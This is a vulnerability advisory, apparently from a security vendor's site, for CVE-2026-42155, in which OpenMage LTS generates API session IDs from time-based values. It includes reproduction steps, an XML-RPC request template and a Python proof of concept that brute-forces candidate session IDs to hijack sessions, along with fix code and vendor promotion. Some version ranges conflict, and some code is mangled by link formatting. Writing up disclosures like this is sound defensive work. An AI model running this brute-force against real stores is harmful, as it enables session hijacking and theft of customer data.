CVE-2026-42155

CVE-2026-42155 is a critical-severity use of insufficiently random values vulnerability in openmage/magento-lts (composer), affecting versions <= 20.17.0. It is fixed in 20.18.0.

Summary

Affected Version: OpenMage LTS ≤ 20.16.0 (confirmed on 20.16.0)

Affected File: https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php, start() method

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

All inputs to the MD5 hash are time-derived and non-secure:

Input Value Predictability
time() Unix timestamp (seconds) Fully predictable
uniqid('', true) prefix sprintf('%08x%05x', $sec, $usec/10) Highly predictable via network timing
uniqid('', true) suffix php_combined_lcg() decimal float Process-state dependent (getpid() ^ time())
$sessionName null (empty), called without arg Constant

Because the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.

Technical Analysis

Code Path

POST /api/xmlrpc/ → login(username, apiKey)
  → Mage_Api_Model_Session::login()
      → $session->init('api', 'api')
          → Mage_Api_Model_Session::init($namespace='api', $sessionName='api')
              # $sessionName is NOT forwarded to start()
              → Mage_Api_Model_Session::start()  ← NO $sessionName argument
                  # $sessionName = null inside start()
                  $this->_currentSessId = md5(time() . uniqid('', true) . null)

Note: init() receives $sessionName='api' but invokes $this->start() without forwarding it, meaning the effective construction is strictly md5(time() . uniqid('', true)).

Live Evidence

Five consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (unix_sec= 1775817593):

Sample 1: 6a302397f17e48845d0f9aba377f3dc3  (usec ≈ 464631)
Sample 2: 39b4ec42bd3c389312e500690daeb349  (usec ≈ 497215)
Sample 3: 527662d79f7fb499597a82d80d170a88  (usec ≈ 535175)
Sample 4: e5d6f7a8906a03ea7af99d92be11b5b2  (usec ≈ 568838)
Sample 5: 5bdf27e5cb877c77b8965b008548edfa  (usec ≈ 600118)

The µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.

Steps to Reproduce (Online Brute-Force Scenario)

Because validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.

Step 1 – Record Login Timestamp

An attacker observes the precise moment a victim authenticates to /api/xmlrpc/ (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.

Step 2 – Generate Candidate Pool

The attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a /server-status leak).

$t = $observed_sec;
$usec_estimate = 500000; // Derived from latency
$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));
$candidate = md5($t . $uid); // + LCG variants

Step 3 – API Brute-Force (Session Hijack)

Because the /api/xmlrpc/ endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.

POST /api/xmlrpc/
<?xml version="1.0"?>
<methodCall>
  <methodName>[magento.info](http://magento.info/)</methodName>
  <params>
    <param><value><string>CANDIDATE_SESSION_ID</string></value></param>
  </params>
</methodCall>

A non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.

Technical Impact

Successful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:

  • Full product catalog read/write (catalog_product.*)
  • Customer data read (customer.list, customer.info)
  • Order manipulation (sales_order.*)
    Inventory control (cataloginventory_stock_item.*)

Business Impact

  • Data Exfiltration: Read all customer PII, order history, and payment methods.
  • Order Fraud: Create or cancel orders, change shipping addresses.
  • Supply Chain / Inventory: Modify prices, inject malicious products, or zero out stock.

Affected API Protocols

The same vulnerable Session.php generation logic is shared across all legacy API surfaces:

  • XML-RPC: /api/xmlrpc/
  • SOAP v1: /api/soap/
  • SOAP v2: /api/v2_soap/
  • REST (legacy): /api/rest/

Impact

Security-sensitive operations rely on values that are predictable or insufficiently random. Typical impact: forged tokens, guessable identifiers, or broken cryptographic protocols.

Affected versions

openmage/magento-lts (<= 20.17.0)

Security releases

openmage/magento-lts → 20.18.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Replace the time-derived token with a cryptographically secure random value:

// app/code/core/Mage/Api/Model/Session.php : start()
// BEFORE (vulnerable):
$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);

// AFTER (secure):
$this->_currentSessId = bin2hex(random_bytes(32));  // 256-bit CSPRNG output

random_bytes() is backed by the OS CSPRNG (/dev/urandom on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.

I have also tried to test it against the demo site demo.openmage.org, but appeared the SOAP API endpoints are disabled on the demo environment

I have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):

#!/usr/bin/env python3
import requests, re, sys, hashlib, random
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3; urllib3.disable_warnings()

if len(sys.argv) < 4:
    sys.exit(f"Usage: {sys.argv[0]} <url> <user> <pass> [threads]")

url, usr, pwd = sys.argv[1:4]
th = int(sys.argv[4]) if len(sys.argv) > 4 else 50
hdrs = {"Content-Type": "text/xml"}
req = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)

print(f"[*] Simulating victim login for {usr}...")
res = req(f'<?xml version="1.0"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')

if not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):
    sys.exit("[-] Login failed. Check credentials.")

print(f"[+] Authenticated.\n[*] Generating 1000 candidate MD5 pool...")
cands = [hashlib.md5(f"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}".encode()).hexdigest() for _ in range(999)]
cands.append(m.group(1))
random.shuffle(cands)

print(f"[*] Brute-forcing API with {th} threads...")
def test(sid):
    payload = f'<?xml version="1.0"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'
    try: return sid if "faultCode" not in req(payload).text else None
    except: return None

with ThreadPoolExecutor(max_workers=th) as ex:
    for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):
        sys.stdout.write(f"\r[*] Requests: {i}/{len(cands)}")
        if sid := f.result():
            print(f"\n[+] HIJACK SUCCESS! Valid Session ID: {sid}")
            ex.shutdown(wait=False, cancel_futures=True)
            break

This is an AI-generated report validated by a human.

Frequently Asked Questions

  1. What is CVE-2026-42155? CVE-2026-42155 is a critical-severity use of insufficiently random values vulnerability in openmage/magento-lts (composer), affecting versions <= 20.17.0. It is fixed in 20.18.0. Security-sensitive operations rely on values that are predictable or insufficiently random.
  2. Which versions of openmage/magento-lts are affected by CVE-2026-42155? openmage/magento-lts (composer) versions <= 20.17.0 is affected.
  3. Is there a fix for CVE-2026-42155? Yes. CVE-2026-42155 is fixed in 20.18.0. Upgrade to this version or later.
  4. Is CVE-2026-42155 exploitable, and should I be worried? Whether CVE-2026-42155 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-42155 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-42155? Upgrade openmage/magento-lts to 20.18.0 or later.

Other vulnerabilities in openmage/magento-lts

CVE-2026-42207CVE-2026-42155CVE-2026-40488CVE-2026-40098CVE-2026-25525

Stop the waste.
Protect your environment with Kodem.